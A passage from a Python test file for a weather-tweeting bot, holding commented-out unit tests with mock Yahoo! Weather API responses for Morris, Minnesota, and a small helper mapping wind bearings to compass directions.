'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '37', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data = weatherBot.get_weather_variables(ydata)
# self.assertEqual(weatherBot.make_special_tweet(weather_data), 'It\'s dry as strained pasta. 4% humid right now.')
#
# def test_make_special_tweet_high_wind(self):
# """Testing if high wind event is triggered"""
# ydata_f = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '33', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '35'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data_f = weatherBot.get_weather_variables(ydata_f)
# self.assertEqual(weatherBot.make_special_tweet(weather_data_f),
# 'Hold onto your hats, the wind is blowing at 35 mph coming from the NW.')
# ydata_c = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '8', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '33', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-33', 'direction': '310', 'speed': '56'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data_c = weatherBot.get_weather_variables(ydata_c)
# self.assertEqual(weatherBot.make_special_tweet(weather_data_c),
# 'Hold onto your hats, the wind is blowing at 56 km/h coming from the NW.')
#
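# The wind tests above expect a bearing of '310' degrees to be reported as
# "NW". A minimal sketch of such a degrees-to-compass-point mapping follows
# (wind_direction is a hypothetical helper; weatherBot's actual implementation
# may differ):

```python
def wind_direction(degrees):
    """Map a wind bearing in degrees to one of eight compass points."""
    points = ['N', 'NE', 'E', 'SE', 'S', 'SW', 'W', 'NW']
    # Shift by half a 45-degree sector so each point is centered on its bearing.
    return points[int((degrees + 22.5) % 360 // 45)]


# 310 degrees lies in the northwest sector:
print(wind_direction(310))  # -> NW
```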
# def test_make_special_tweet_drizzle(self):
# """Testing if drizzle event is triggered"""
# ydata1 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '8', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data1 = weatherBot.get_weather_variables(ydata1)
# self.assertEqual(weatherBot.make_special_tweet(weather_data1), 'Drizzlin\' yo.')
# ydata2 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '8', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '9', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-33', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data2 = weatherBot.get_weather_variables(ydata2)
# self.assertEqual(weatherBot.make_special_tweet(weather_data2), 'Drizzlin\' yo.')
#
# def test_make_special_tweet_snow(self):
# """Testing if snow event is triggered"""
# ydata1 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '13', 'text': 'Snow Flurries'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data1 = weatherBot.get_weather_variables(ydata1)
# self.assertEqual(weatherBot.make_special_tweet(weather_data1), 'Snow flurries. Bundle up.')
# ydata2 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '8', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '14', 'text': 'Light Snow Showers'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-33', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data2 = weatherBot.get_weather_variables(ydata2)
# self.assertEqual(weatherBot.make_special_tweet(weather_data2), 'Light snow showers. Bundle up.')
# ydata3 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '15', 'text': 'Blowing Snow'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data3 = weatherBot.get_weather_variables(ydata3)
# self.assertEqual(weatherBot.make_special_tweet(weather_data3), 'Blowing snow. Bundle up.')
# ydata4 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
# Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '8', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '16', 'text': 'Snow'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-33', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data4 = weatherBot.get_weather_variables(ydata4)
# self.assertEqual(weatherBot.make_special_tweet(weather_data4), 'Snow. Bundle up.')
# ydata5 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! 
# Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '41', 'text': 'Heavy Snow'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data5 = weatherBot.get_weather_variables(ydata5)
# self.assertEqual(weatherBot.make_special_tweet(weather_data5), 'Heavy snow. Bundle up.')
